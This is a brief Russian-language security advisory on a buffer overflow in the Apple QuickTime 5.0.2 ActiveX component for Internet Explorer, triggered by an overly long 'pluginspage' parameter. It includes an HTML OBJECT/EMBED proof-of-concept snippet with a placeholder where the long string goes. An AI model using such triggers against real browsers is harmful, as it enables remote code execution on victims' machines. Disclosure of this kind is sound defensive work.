Уязвимость обнаружена в ActiveX компоненте Apple Quicktime для Internet Explorer. Если ActiveX компонент вызван с чрезмерно длинным параметром «pluginspage», произойдет переполнение буфера. Уязвимость позволяет
атакующему выполнить произвольный код на уязвимой системе. Уязвимость может использоваться через Web браузер или HTML почтовое сообщение. Пример: 

<OBJECT CLASSID="clsid:02BF25D5-8C1-4B23-BC80-D3488ABDDC6B"
WIDTH="480" HEIGHT="36">
<PARAM NAME="src" VALUE="test.mov">
<PARAM NAME="controller" VALUE="false">
<PARAM NAME="target" VALUE="myself">
<PARAM NAME="href" VALUE="test.mov">
<PARAM NAME=»pluginspage» VALUE=»очень длинная стока»>
<EMBED WIDTH=»480″ HEIGHT=»36″ CONTROLLER=»false»
TARGET="myself" href=»https://xakep.ru/wp-content/uploads/post/16273/test2.mov»
SRC="test.mov"
BGCOLOR="FFFFFF"
BORDER="0"
PLUGINSPAGE=" очень длинная стока»>
</EMBED>
</OBJECT>

Уязвимость обнаружена в Apple Quicktime ActiveX Component 5.0.2.



Оставить мнение